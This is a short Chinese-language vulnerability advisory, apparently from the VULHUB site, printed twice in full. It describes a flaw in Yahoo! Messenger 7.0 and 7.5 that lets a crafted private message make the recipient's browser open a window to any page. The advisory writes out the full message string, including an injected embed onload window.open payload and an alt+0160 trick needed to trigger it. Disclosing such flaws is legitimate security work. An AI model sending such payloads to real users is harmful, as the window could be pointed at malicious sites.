VULHUB ™

Yahoo! Messenger是一款流行的即时通信软件。 Yahoo! Messenger不正确处理恶意消息，远程攻击者可以利用漏洞在目标用户浏览器上打开浏览器窗口到任意页面。 发送如下私有消息给目标用户： :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------&lt;embed onload=window.open('http:\\\\google.com/')&gt;helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------&lt;embed onload=window.open('http:\\\\google.com/')&gt;helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?( 注意&quot;helomsg :&quot;这空格必须以alt+0160方法建立。这样的消息可导致yahoo打开浏览器导航到google.com站点。 Yahoo! Messenger 7.5 .814 Yahoo! Messenger 7.0 .438 <a href="http://messenger.yahoo.com/" target="_blank">http://messenger.yahoo.com/</a>

Yahoo! Messenger是一款流行的即时通信软件。 Yahoo! Messenger不正确处理恶意消息，远程攻击者可以利用漏洞在目标用户浏览器上打开浏览器窗口到任意页面。 发送如下私有消息给目标用户： :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------&lt;embed onload=window.open('http:\\\\google.com/')&gt;helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------&lt;embed onload=window.open('http:\\\\google.com/')&gt;helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?( 注意&quot;helomsg :&quot;这空格必须以alt+0160方法建立。这样的消息可导致yahoo打开浏览器导航到google.com站点。 Yahoo! Messenger 7.5 .814 Yahoo! Messenger 7.0 .438 <a href="http://messenger.yahoo.com/" target="_blank">http://messenger.yahoo.com/</a>